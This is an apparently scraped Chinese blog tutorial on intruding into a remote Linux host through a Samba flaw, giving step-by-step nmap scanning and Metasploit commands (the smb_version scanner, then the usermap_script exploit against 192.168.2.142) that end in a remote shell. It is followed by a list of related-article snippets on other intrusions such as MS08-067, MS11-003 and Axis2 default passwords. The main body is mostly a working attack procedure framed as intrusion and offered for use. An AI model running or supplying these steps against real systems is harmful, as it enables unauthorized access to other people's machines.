linux端口利用入侵,利用samba服务漏洞入侵linux主机
Samba是在Linux和UNIX系统上实现SMB协议的一个免费软件,由服务器及客户端程序构成,samba服务对应的端口有139、445等等.本文将简单介绍metasploit利用samba漏洞入侵进入远程linux主机. step1) 首先要扫描目标主机上开放的端口和服务,用nmap,命令如下: nmap
Samba是在Linux和UNIX系统上实现SMB协议的一个免费软件,由服务器及客户端程序构成,samba服务对应的端口有139、445等等.本文将简单介绍metasploit利用samba漏洞入侵进入远程linux主机.
step1)首先要扫描目标主机上开放的端口和服务,用nmap,命令如下:
nmap-sS -Pn -A 192.168.2.142
step2)发现主机上开放的139,445端口之后,说明该主机有可能存在samba服务远程溢出漏洞,尝试通过该端口建立一个meterpreter 会话,需要用到metasploit.
step3)打开metasploit之后需要先判断samba的版本,命令如下:
-msf> search scanner/samba
这条命令用来查找samba相关exploit参数
step4)然后使用如下命令来定义要扫描samba的版本所用到的exploits参数。
msf> use auxiliary/scanner/smb/smb_version
msfauxiliary(smb_version) > set RHOSTS 192.168.2.142
这条命令定义你将要扫描samba版本的远程主机的IP地址.
exploit
该命令将开始漏洞利用
step5)发现samba版本之后,我们需要进一步利用来入侵进入到远程linux主机
msf> use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > set RHOST 192.168.2.142
msf exploit(usermap_script) > exploit
执行完成以上命令如图所示,成功创建了shell 会话.
linux端口利用入侵,利用samba服务漏洞入侵linux主机相关推荐
- kali利用msf工具对ms08-067漏洞入侵靶机(win xp2)
kali利用msf工具对ms08-067漏洞入侵靶机(win xp2) 漏洞简介 MS08-067漏洞将会影响Windows 2000/XP/Server 2003/Vista/Server 2008 ...
- linux samba 服务端口号,Linux系统学习 二十、SAMBA服务—介绍、安装、端口
1.简介 网络数据文件共享服务器 可以和Windows中的网上邻居通用 数据共享的方法: Windows中最常用的是"网上邻居".网上邻居使用的文件系统是CIFS(通用互联网文件系 ...
- linux的samba服务实验报告,Linux Samba服务器配置实验报告.doc
湖北理工学院 实验报告 课程名称: Linux 网络环境 实验项目:Samba服务器配置 专 业: 班 级: 学 号: 学生姓名: 实验报告 实验项目名称: Samba服务器配置 同组人:无 实验时间 ...
- 在红帽Linux上安装samba服务,如何在linux上安装配置samba服务器
如何在linux上安装配置samba服务器 更新时间:2019-10-29 22:40 最满意答案 1.首先需要登入安装了Linux系统的计算机,安装Samba.Fedora发行版一般使用yum工具安 ...
- java编写Linux文件共享,ubuntu下用samba实现windows与linux文件共享
ubuntu下用samba实现windows与linux文件共享 首先要安装samba sudo apt-get install samba sudo apt-get install smbfs 1. ...
- linux端口扫描nc,使用 netcat [nc] 命令对 Linux 和 Unix 进行端口扫描
我如何在自己的服务器上找出哪些端口是开放的?如何使用 nc 命令进行端口扫描来替换 Linux 或类 Unix 中的 nmap 命令? nmap ("Network Mapper" ...
- 日志审计与分析--Linux日志收集(配置rsyslog服务收集其他Linux服务器日志)
目录 实验准备 实验步骤: 一.重启rsyslog服务 二.配置rsyslog客户端 三.验证rsyslog配置 实验准备 实验目的: 1.掌握rsyslog配置方法 ...
- 利用Axis2默认口令安全漏洞入侵WebService网站
近期,在黑吧安全网上关注了几则利用Axis2默认口令进行渗透测试的案例,大家的渗透思路基本一致,利用的技术工具也大致相同,我在总结这几则案例的基础之上进行了技术思路的拓展. 黑吧安全网Axis2默认口 ...
- kail利用msf工具对ms11-003漏洞入侵渗透Win7
前言: windows7IE溢出攻击 实验环境: 工具:metasploit 靶机两台:windows 7和kali2020 攻击机IP地址:10.20.29.129 被攻击机IP地址:10.20.2 ...
- linux 虚拟机大量udp请求失败_利用PXE远程装机服务批量部署Linux
1.安装并配置DHCP服务器 (要先安装yum源) yum -y install dhcp cd /usr/share/doc/ cd dhcp-4.2.5/ 拷贝example文件到另一目录并覆盖: ...
最新文章
- [云炬学英语]每日一句2020.9.5
- 表弟:这数学规律题该怎么解决呢?使用Python你会发现很简单
- php跳转分站,PHP判断IP并转跳到相应城市分站的方法
- mysql 5.5 主从同步问题_MySQL 5.5 主从复制异步、半同步以及注意事项详解
- python delphi_python4delphi 使用
- 心理正常与异常的区分_教师培训 | 学生常见心理问题的表现与识别
- 大数据Hive深入讲解
- Python 之父 Guido van Rossum 退休失败,正式加入微软搞开源!
- 【经典算法实现 14】阿克曼函数(手动推导求解、递归实现、非递归实现)
- matlab 文本分析工具,MATLAB,Simulink. - Text Analytics , 文本分析工具箱-鈦思科技
- UINavigationBar颜色设置 用色码设置有误差
- e1载波的数据速率是_基于宽带电力线载波通信的路由技术研究
- YApi接口平台-接口挡板
- oracle min(date),Oracle / PLSQL MIN函数
- JavaScript实现节点的增加修改删除查找
- seafile私有云盘搭建全过程记录
- 放回不等概率抽样-PPS抽样
- vue瀑布流布局插件vue-masonry
- 国内10个千年古镇 绝美春色洗涤你的眼
- 疯狂Spring Cloud微服务架构实战